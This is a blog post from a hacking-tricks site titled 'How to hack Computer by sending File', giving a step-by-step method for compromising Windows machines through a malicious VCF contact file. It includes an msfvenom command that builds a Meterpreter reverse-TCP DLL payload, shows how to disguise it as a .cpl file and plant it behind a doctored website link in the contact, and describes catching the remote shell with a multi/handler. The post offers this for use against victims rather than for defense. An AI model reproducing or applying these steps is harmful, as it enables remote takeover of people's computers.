WELCOME TO WWW.TRICKSFUTURE.COM JOIN US FOR SELF EDUCATE YOURSELF TO THE CYBER SECURITY AND SHARE US TO SPREAD THE KNOWLEGDE How to hack Computer by sending File - CYBER ERA

CYBER ERA

cyber tricks, facebook tricks, hacking ,whatsapp, networking,android cracked apps , cracked games, hacking tricks, wifi tricks,

Search This Blog

Note

Hello visitors, I am author of this blog ,if you face any problem or Anything you dont understand dont hesitate to comment or inform me i will try my best to provide you best of my knowledge contact me directly on my email id kmaker507@gmail.com

Friday, 8 February 2019

How to hack Computer by sending File




Requirements:pc with kali linux installed
some knowledge about payloads
and some brain



Process

  • Making an msfvenom windows payload with .dll extension.
  • Sending the dll file in a folder named “http”.
  • Creating a contact file in the parent folder of “http”.
  • Adding a website into the contact.
  • Changing the prefix of website from http:// to http.\\
  • Renaming the dll file to “<name of website>.cpl”
  • Running multi handler in a window
  • Opening the website path from the contact
  • Spawning shell.


1msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f dll > shell.dll

Exploiting Windows PC using Malicious Contact VCF file

Next we transfer this payload to the victim machine in a new folder named http. This has to be http and nothing else since we are including a path later on in the website link. And it has to be in the current directory too. So we copy this shell.dll file into the victim machine.

Exploiting Windows PC using Malicious Contact VCF file

Next and the most important step is to make a contact VCF file. You can download a sample vcf too and add a website but we made a new contact file. The system we are using is windows 10 so the version of VCF file may differ from yours but it would work just the same.

Exploiting Windows PC using Malicious Contact VCF file

Add any name in the contact file.
I added Raj Chandel.

Exploiting Windows PC using Malicious Contact VCF file

Traverse to the next tab home and you’ll see a text box to input a website. Add any website’s name as you desire. I added my website’s name “hackingarticles.in” but here is the most important thing you have to note here:
A generic website’s link is https://www.hackingarticles.in but we modify the prefix just a little by replacing the http:// with http.\\
This is because we don’t actually want to include a website but we want to include a path to our DLL file so that when the victim click’s on the website, our DLL should run.
Here, we are suffixing the website link with “.cpl” extension. A CPL file is a control panel item, such as Displays, Mouse, Sound, or Networking, used by the Windows operating system.

Exploiting Windows PC using Malicious Contact VCF file

Save the contact. Now rename our payload from shell.dll to “www.hackingarticles.in.cpl”

Exploiting Windows PC using Malicious Contact VCF file

Now we are prepped and ready to run the DLL file so we set up multi/handler on a terminal window and opened the contact on victim’s machine.

Exploiting Windows PC using Malicious Contact VCF file

As soon as we click on the link here, we will see a session is obtained in the kali terminal!

Exploiting Windows PC using Malicious Contact VCF file

This spawns a shell of the current user of windows that is logged on.

Credit to prodefence
subscribe and follow tricksfuture

No comments:

Post a Comment

If any issue, let me know